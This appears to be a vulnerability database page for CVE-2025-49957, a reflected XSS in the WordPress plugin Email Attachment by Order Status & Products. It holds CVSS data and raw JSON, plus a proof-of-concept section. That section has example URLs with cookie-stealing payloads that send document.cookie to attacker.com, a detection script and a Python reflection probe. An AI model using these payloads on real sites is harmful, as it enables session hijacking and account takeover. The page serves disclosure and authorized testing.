Security Vulnerability Report
CVE-2025-49957 CVSS 7.1 HIGH

CVE-2025-49957

Published: 2025-10-22 15:15:42
Last Modified: 2026-04-28 19:33:16

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Weboccult Technologies Pvt Ltd Email Attachment by Order Status & Products (slug: email-attachment-by-order-status-products) allows Reflected XSS. This issue affects Email Attachment by Order Status & Products: from n/a through <= 1.0.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration (CPE) data is available for this record; the affected version range below is taken from the description.

Email Attachment by Order Status & Products <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-49957 PoC - Reflected XSS in Email Attachment by Order Status & Products -->
<!-- Target: WordPress Plugin Email Attachment by Order Status & Products <= 1.0.1 -->
<!-- Attack Vector: Malicious URL with injected JavaScript in plugin's input parameters -->
<!-- Attack Scenario:
     1. Attacker crafts a malicious URL with XSS payload in plugin parameters
     2. Attacker tricks victim (site admin or user) into clicking the link
     3. Victim's browser executes the injected JavaScript
     4. Attacker steals session cookies or performs actions on behalf of victim -->
<!-- NOTE: the advisory does not name the reflected parameter. order_id, product_id and
     status below are placeholders; replace them with the parameter actually echoed by
     the plugin's request handling. -->

<!-- Example PoC URLs (modify target domain): -->
<!-- PoC 1: Basic alert payload to test vulnerability -->
<!-- https://vulnerable-site.com/?order_id=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E -->
<!-- PoC 2: Cookie stealing payload -->
<!-- https://vulnerable-site.com/?order_id=%3Cimg%20src=x%20onerror=%22fetch%28%27https://attacker.com/log?c=%27+encodeURIComponent%28document.cookie%29%29%22%3E -->
<!-- PoC 3: Session hijacking via redirect with the cookie in the query string -->
<!-- https://vulnerable-site.com/?product_id=%3Cscript%3Edocument.location=%27https://attacker.com/steal?cookie=%27+document.cookie%3C/script%3E -->

<!-- JavaScript payload for automated testing: -->
<script>
  // CVE-2025-49957 PoC Payload
  // The closing tag is written as <\/script> so the HTML parser does not end this
  // <script> block in the middle of the string literal.
  var xss_payload = "<script>alert('CVE-2025-49957 XSS Vulnerability')<\/script>";
  var malicious_url = window.location.origin + window.location.pathname
    + "?order_id=" + encodeURIComponent(xss_payload);
  console.log("Testing XSS at: " + malicious_url);
  document.write("<h3>XSS Test Payload Injected</h3>");
</script>

<!-- Detection Script: -->
<script>
  function testCVE202549957() {
    const params = new URLSearchParams(window.location.search);
    // Check whether plugin parameters are reflected without encoding.
    ['order_id', 'product_id', 'status'].forEach(param => {
      if (params.has(param)) {
        const value = params.get(param);
        // Only an exact match in innerHTML proves the markup landed unencoded.
        // (Comparing against innerText with the tags stripped is not a valid check:
        // for a tag-only payload the stripped string is empty and always matches.)
        if (document.body.innerHTML.includes(value)) {
          console.log("[VULN] Parameter '" + param + "' appears vulnerable to XSS");
        }
      }
    });
  }
  testCVE202549957();
</script>
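A quieter way to confirm a reflected sink than the alert payloads above is a canary probe: send a unique marker followed by the four HTML-significant characters and inspect how each one comes back in the response. The script below is an added example for this page, not code from the original report or from the plugin vendor. The parameter name is whatever the tester identifies in the plugin's request handling (the advisory does not name it), and the sample responses in `SAMPLES` are constructed inline to illustrate each verdict.

```python
import html
import re
import secrets
import urllib.parse
import urllib.request

# The characters whose unencoded reflection decides whether a sink is exploitable:
# '<' and '>' break out of HTML text, '"' and "'" break out of attribute values.
CANARY_SPECIALS = '<>"\''

# Matches one HTML character reference such as &lt; &quot; &#039; &#x27;
ENTITY_RE = re.compile(r"&(?:#\d+|#x[0-9a-fA-F]+|[a-zA-Z][a-zA-Z0-9]*);")


def make_canary() -> str:
    """Unique 10-character marker so a match in the response cannot be a coincidence."""
    return "zx" + secrets.token_hex(4)


def classify_reflection(body: str, canary: str, specials: str = CANARY_SPECIALS) -> dict:
    """Find every echo of `canary` and record, per echo, which special characters
    followed it unencoded (raw) and which came back as entities (encoded)."""
    hits = []
    for m in re.finditer(re.escape(canary), body):
        pos = m.end()
        raw, encoded = [], []
        for ch in specials:
            if body.startswith(ch, pos):          # literal character survived
                raw.append(ch)
                pos += 1
                continue
            ent = ENTITY_RE.match(body, pos)
            if ent and html.unescape(ent.group(0)) == ch:   # escaped on output
                encoded.append(ch)
                pos = ent.end()
                continue
            break  # character stripped or sequence altered: stop reading this echo
        hits.append({"offset": m.start(), "raw": raw, "encoded": encoded})

    if not hits:
        verdict = "not_reflected"
    elif any(h["raw"] for h in hits):
        verdict = "unencoded_reflection"      # at least one breakout character is live
    elif all(len(h["encoded"]) == len(specials) for h in hits):
        verdict = "encoded_reflection"        # every echo is fully entity-encoded
    else:
        verdict = "altered_reflection"        # echoed but sanitized/truncated; inspect manually
    return {"verdict": verdict, "hits": hits}


def probe(url: str, param: str, timeout: float = 10.0) -> dict:
    """Live check: put the canary into query parameter `param` of `url` and classify
    the response. Requires network access and authorization to test the target."""
    canary = make_canary()
    parts = urllib.parse.urlsplit(url)
    query = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    query[param] = canary + CANARY_SPECIALS
    target = urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query)))
    req = urllib.request.Request(target, headers={"User-Agent": "reflection-probe/1.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    result = classify_reflection(body, canary)
    result.update({"param": param, "url": target})
    return result


# Constructed sample responses (not captured from any real site), one per verdict.
CANARY = "zxdeadbeef"
SAMPLES = {
    "raw_text":          '<p>Order zxdeadbeef<>"\' not found</p>',
    "esc_html":          '<p>Order zxdeadbeef&lt;&gt;&quot;&#039; not found</p>',
    "esc_attr_partial":  '<input name="order" value="zxdeadbeef&lt;&gt;&quot;\'">',
    "stripped":          '<p>Order zxdeadbeef not found</p>',
    "absent":            '<p>Order not found</p>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        r = classify_reflection(body, CANARY)
        print(f"{name:18s} {r['verdict']:22s} raw={[h['raw'] for h in r['hits']]}")
```

`probe()` does the live request; the `__main__` section only runs the constructed samples. Reading the result: a `raw` list containing `<` means the value lands unencoded in HTML text, the classic reflected-XSS case; `<` encoded but `"` or `'` raw points at an attribute value whose escaping is incomplete, which is still exploitable via event-handler attributes; `altered_reflection` means the value was sanitized or truncated and needs manual review rather than an automatic verdict.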

References

https://patchstack.com/database/Wordpress/Plugin/email-attachment-by-order-status-products/vulnerability/wordpress-email-attachment-by-order-status-products-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-49957",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-22T15:15:42.270",
    "lastModified": "2026-04-28T19:33:16.100",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Weboccult Technologies Pvt Ltd Email Attachment by Order Status & Products email-attachment-by-order-status-products allows Reflected XSS.This issue affects Email Attachment by Order Status & Products: from n/a through <= 1.0.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.7
        },
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/email-attachment-by-order-status-products/vulnerability/wordpress-email-attachment-by-order-status-products-plugin-1-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}